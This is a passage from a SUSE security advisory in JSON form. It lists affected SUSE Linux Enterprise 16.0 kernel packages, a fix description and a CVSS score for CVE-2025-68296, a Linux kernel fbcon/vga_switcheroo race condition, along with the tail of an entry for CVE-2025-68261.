"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68261"
},
{
"cve": "CVE-2025-68296",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68296"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup\n\nProtect vga_switcheroo_client_fb_set() with console lock. Avoids OOB\naccess in fbcon_remap_all(). Without holding the console lock the call\nraces with switching outputs.\n\nVGA switcheroo calls fbcon_remap_all() when switching clients. The fbcon\nfunction uses struct fb_info.node, which is set by register_framebuffer().\nAs the fb-helper code currently sets up VGA switcheroo before registering\nthe framebuffer, the value of node is -1 and therefore not a legal value.\nFor example, fbcon uses the value within set_con2fb_map() [1] as an index\ninto an array.\n\nMoving vga_switcheroo_client_fb_set() after register_framebuffer() can\nresult in VGA switching that does not switch fbcon correctly.\n\nTherefore move vga_switcheroo_client_fb_set() under fbcon_fb_registered(),\nwhich already holds the console lock. Fbdev calls fbcon_fb_registered()\nfrom within register_framebuffer(). Serializes the helper with VGA\nswitcheroo\u0027s call to fbcon_remap_all().\n\nAlthough vga_switcheroo_client_fb_set() takes an instance of struct fb_info\nas parameter, it really only needs the contained fbcon state. Moving the\ncall to fbcon initialization is therefore cleaner than before. Only amdgpu,\ni915, nouveau and radeon support vga_switcheroo. For all other drivers,\nthis change does nothing.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68296",
"url": "https://www.suse.com/security/cve/CVE-2025-68296"
},
{
"category": "external",
"summary": "SUSE Bug 1255128 for CVE-2025-68296",
"url": "https://bugzilla.suse.com/1255128"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
